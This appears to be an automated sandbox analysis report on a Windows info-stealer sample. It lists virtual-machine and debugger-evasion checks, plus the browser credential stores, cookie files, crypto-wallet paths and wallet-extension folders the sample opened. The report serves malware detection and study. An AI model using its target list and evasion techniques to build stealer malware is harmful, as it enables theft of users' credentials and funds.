Source: I2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWjV
Source: Amcache.hve.8.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.8.dr | Binary or memory string: vmci.sys
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.8.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.dr | Binary or memory string: VMware VMCI Bus Device
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
Source: Amcache.hve.8.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.8.dr | Binary or memory string: VMware Virtual USB Mouse
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.8.dr | Binary or memory string: VMware, Inc.
Source: Amcache.hve.8.dr | Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.8.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.8.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.8.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.8.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: Amcache.hve.8.dr | Binary or memory string: vmci.syshbin`
Source: Amcache.hve.8.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.8.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | API call chain: ExitProcess graph end node (graph_0-74210)

                  Anti Debugging

                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_004244E4 NtSetInformationThread 000000FE,00000011,00000000,00000000,?,?,?,?,?,0041EC64 0_2_004244E4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep graph_0-74296
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Thread information set: HideFromDebugger
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; System information queried: KernelDebuggerInformation
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Process queried: DebugPort
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Process queried: DebugObjectHandle
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Process queried: DebugFlags
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00429EF7 rdtsc 0_2_00429EF7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0044E33B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation, 0_2_0041F9A4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00422177 mov eax, dword ptr fs:[00000030h] 0_2_00422177
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00443998 mov ecx, dword ptr fs:[00000030h] 0_2_00443998
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0041F9A4 mov eax, dword ptr fs:[00000030h] 0_2_0041F9A4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_004262A1 mov eax, dword ptr fs:[00000030h] 0_2_004262A1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0043B362 mov eax, dword ptr fs:[00000030h] 0_2_0043B362
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0044FB15 mov eax, dword ptr fs:[00000030h] 0_2_0044FB15
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_004244E4 mov eax, dword ptr fs:[00000030h] 0_2_004244E4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_004224A3 mov eax, dword ptr fs:[00000030h] 0_2_004224A3
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_004245EC mov eax, dword ptr fs:[00000030h] 0_2_004245EC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00421EEB mov eax, dword ptr fs:[00000030h] 0_2_00421EEB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00422817 mov eax, dword ptr fs:[00000030h] 0_2_00422817
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0041F916 mov eax, dword ptr fs:[00000030h] 0_2_0041F916
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_004269E4 mov eax, dword ptr fs:[00000030h] 0_2_004269E4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00424995 mov eax, dword ptr fs:[00000030h] 0_2_00424995
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00424995 mov eax, dword ptr fs:[00000030h] 0_2_00424995
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00426A42 mov eax, dword ptr fs:[00000030h] 0_2_00426A42
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0042F265 mov eax, dword ptr fs:[00000030h] 0_2_0042F265
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00424B24 mov eax, dword ptr fs:[00000030h] 0_2_00424B24
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0041EBEB mov eax, dword ptr fs:[00000030h] 0_2_0041EBEB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00424BED mov eax, dword ptr fs:[00000030h] 0_2_00424BED
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00424C8D mov eax, dword ptr fs:[00000030h] 0_2_00424C8D
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0041E6F0 mov eax, dword ptr fs:[00000030h] 0_2_0041E6F0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00429EF7 mov eax, dword ptr fs:[00000030h] 0_2_00429EF7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF2A7E mov eax, dword ptr fs:[00000030h] 0_2_02EF2A7E
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F13BFF mov ecx, dword ptr fs:[00000030h] 0_2_02F13BFF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF4BFC mov eax, dword ptr fs:[00000030h] 0_2_02EF4BFC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF4BFC mov eax, dword ptr fs:[00000030h] 0_2_02EF4BFC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF23DE mov eax, dword ptr fs:[00000030h] 0_2_02EF23DE
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EEFB7D mov eax, dword ptr fs:[00000030h] 0_2_02EEFB7D
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF4853 mov eax, dword ptr fs:[00000030h] 0_2_02EF4853
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EFA15E mov eax, dword ptr fs:[00000030h] 0_2_02EFA15E
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EEE957 mov eax, dword ptr fs:[00000030h] 0_2_02EEE957
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF2152 mov eax, dword ptr fs:[00000030h] 0_2_02EF2152
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02ED092B mov eax, dword ptr fs:[00000030h] 0_2_02ED092B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF4EF4 mov eax, dword ptr fs:[00000030h] 0_2_02EF4EF4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF4E54 mov eax, dword ptr fs:[00000030h] 0_2_02EF4E54
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EEEE52 mov eax, dword ptr fs:[00000030h] 0_2_02EEEE52
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF474B mov eax, dword ptr fs:[00000030h] 0_2_02EF474B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF270A mov eax, dword ptr fs:[00000030h] 0_2_02EF270A
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EFF4CC mov eax, dword ptr fs:[00000030h] 0_2_02EFF4CC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF6CA9 mov eax, dword ptr fs:[00000030h] 0_2_02EF6CA9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF6C4B mov eax, dword ptr fs:[00000030h] 0_2_02EF6C4B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EEFC0B mov eax, dword ptr fs:[00000030h] 0_2_02EEFC0B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F0B5C9 mov eax, dword ptr fs:[00000030h] 0_2_02F0B5C9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF4D8B mov eax, dword ptr fs:[00000030h] 0_2_02EF4D8B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02ED0D90 mov eax, dword ptr fs:[00000030h] 0_2_02ED0D90
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F1FD7C mov eax, dword ptr fs:[00000030h] 0_2_02F1FD7C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02EF6508 mov eax, dword ptr fs:[00000030h] 0_2_02EF6508
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F6980B push dword ptr fs:[00000030h] 0_2_02F6980B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0043323B GetProcessHeap,CreateDCW,GetSystemMetrics,GetSystemMetrics,DeleteDC, 0_2_0043323B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0044E33B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0044E33B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0043D3A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0043D3A0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0043CE89 SetUnhandledExceptionFilter, 0_2_0043CE89
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0043CE95 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0043CE95
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F0D0F0 SetUnhandledExceptionFilter, 0_2_02F0D0F0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F0D0FC IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F0D0FC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F0D607 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_02F0D607
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_02F1E5A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_02F1E5A2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0043D0B8 cpuid 0_2_0043D0B8
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_0044614F GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0044614F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00402476 GetComputerNameW,GetUserNameW, 0_2_00402476
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exe; Code function: 0_2_00453BC4 GetTimeZoneInformation, 0_2_00453BC4
                  Source: Amcache.hve.8.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.8.dr; Binary or memory string: msmpeng.exe
                  Source: Amcache.hve.8.dr; Binary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.8.dr; Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                  Source: Amcache.hve.8.dr; Binary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 0.2.I2BJhmJou4.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.I2BJhmJou4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.I2BJhmJou4.exe.49f0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: I2BJhmJou4.exe PID: 7500, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\Electrum\wallets
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: I2BJhmJou4.exeString found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: I2BJhmJou4.exe, 00000000.00000002.3250103126.00000000058FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
                  Source: I2BJhmJou4.exe, 00000000.00000002.3250103126.00000000058FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum0
                  Source: I2BJhmJou4.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.000000000565F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystoremu
                  Source: I2BJhmJou4.exe, 00000000.00000002.3250103126.00000000058FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger LiveM
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\kz8kl7vh.default\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhlJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOGJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\MANIFEST-000001Jump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\CURRENTJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcoblJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmlJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
